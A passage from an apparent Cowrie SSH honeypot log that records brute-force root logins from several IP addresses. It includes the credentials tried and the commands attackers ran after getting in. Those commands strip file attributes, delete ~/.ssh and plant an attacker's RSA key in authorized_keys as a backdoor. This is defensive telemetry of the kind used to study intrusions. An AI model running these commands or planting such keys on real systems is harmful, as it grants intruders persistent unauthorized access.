-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:21:22.859483Z","src_ip":"129.226.183.73","session":"35524bf5968c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:21:23.957047Z","src_ip":"129.226.183.73","session":"35524bf5968c"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:21:24.239673Z","src_ip":"129.226.183.73","session":"bb9319e39aed"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:21:24.240740Z","src_ip":"129.226.183.73","session":"35524bf5968c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61044,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a6291c9c718","protocol":"ssh","message":"New connection: 217.72.205.35:61044 (1.2.3.4:22) [session: 3a6291c9c718]","sensor":"my-vps","timestamp":"2025-08-24T21:21:56.646970Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:21:56.648022Z","src_ip":"217.72.205.35","session":"3a6291c9c718"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:22:31.573873Z","src_ip":"180.184.65.100","session":"0b3ec53898e3"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":49542,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcefa9dd593c","protocol":"ssh","message":"New connection: 60.221.239.232:49542 (1.2.3.4:22) [session: bcefa9dd593c]","sensor":"my-vps","timestamp":"2025-08-24T21:22:33.928589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:22:33.929549Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:22:34.089479Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.login.success","username":"root","password":"$RFV5tgb^YHN","message":"login attempt [root/$RFV5tgb^YHN] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:22:34.767766Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:22:35.151831Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:22:35.152553Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:22:35.153780Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:22:35.315237Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:22:35.648628Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:22:35.649348Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:22:35.811352Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:22:35.812414Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":49554,"dst_ip":"1.2.3.4","dst_port":22,"session":"f86ec0702f86","protocol":"ssh","message":"New connection: 60.221.239.232:49554 (1.2.3.4:22) [session: f86ec0702f86]","sensor":"my-vps","timestamp":"2025-08-24T21:22:35.963892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:22:35.965021Z","src_ip":"60.221.239.232","session":"f86ec0702f86"}
{"eventid":"cowrie.session.connect","src_ip":"36.26.74.162","src_port":42126,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ed558594398","protocol":"ssh","message":"New connection: 36.26.74.162:42126 (1.2.3.4:22) [session: 9ed558594398]","sensor":"my-vps","timestamp":"2025-08-24T21:22:36.889685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:22:36.891439Z","src_ip":"36.26.74.162","session":"9ed558594398"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:22:37.096117Z","src_ip":"36.26.74.162","session":"9ed558594398"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd@12345","message":"login attempt [root/Abcd@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:22:37.959016Z","src_ip":"36.26.74.162","session":"9ed558594398"}
{"eventid":"cowrie.session.connect","src_ip":"150.5.129.10","src_port":42976,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c3b849ff556","protocol":"ssh","message":"New connection: 150.5.129.10:42976 (1.2.3.4:22) [session: 7c3b849ff556]","sensor":"my-vps","timestamp":"2025-08-24T21:22:58.986918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:22:58.987970Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:22:59.193398Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.login.success","username":"root","password":"dupadupa","message":"login attempt [root/dupadupa] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:23:00.055706Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:23:00.526907Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:23:00.527665Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:23:00.528715Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:00.735157Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:23:01.167723Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:23:01.169968Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:23:01.378782Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:01.379722Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.session.connect","src_ip":"150.5.129.10","src_port":43578,"dst_ip":"1.2.3.4","dst_port":22,"session":"1311ba3c031a","protocol":"ssh","message":"New connection: 150.5.129.10:43578 (1.2.3.4:22) [session: 1311ba3c031a]","sensor":"my-vps","timestamp":"2025-08-24T21:23:01.577440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:23:01.578797Z","src_ip":"150.5.129.10","session":"1311ba3c031a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:23:01.780455Z","src_ip":"150.5.129.10","session":"1311ba3c031a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:02.628456Z","src_ip":"150.5.129.10","session":"1311ba3c031a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:03.832771Z","src_ip":"150.5.129.10","session":"1311ba3c031a"}
{"eventid":"cowrie.session.connect","src_ip":"150.5.129.10","src_port":44172,"dst_ip":"1.2.3.4","dst_port":22,"session":"97220de7203a","protocol":"ssh","message":"New connection: 150.5.129.10:44172 (1.2.3.4:22) [session: 97220de7203a]","sensor":"my-vps","timestamp":"2025-08-24T21:23:04.031035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:23:04.031812Z","src_ip":"150.5.129.10","session":"97220de7203a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:23:04.232410Z","src_ip":"150.5.129.10","session":"97220de7203a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:23:05.076566Z","src_ip":"150.5.129.10","session":"97220de7203a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:05.278444Z","src_ip":"150.5.129.10","session":"97220de7203a"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:05.281957Z","src_ip":"150.5.129.10","session":"7c3b849ff556"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":37158,"dst_ip":"1.2.3.4","dst_port":22,"session":"9db1618ae88a","protocol":"ssh","message":"New connection: 129.226.183.73:37158 (1.2.3.4:22) [session: 9db1618ae88a]","sensor":"my-vps","timestamp":"2025-08-24T21:23:24.861920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:23:24.865156Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:23:25.139074Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty77","message":"login attempt [root/qwerty77] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:23:26.234328Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:23:26.858267Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:23:26.858974Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:23:26.859758Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:27.131221Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:23:27.745207Z","src_ip":"129.226.183.73","session":"9db1618ae88a"}
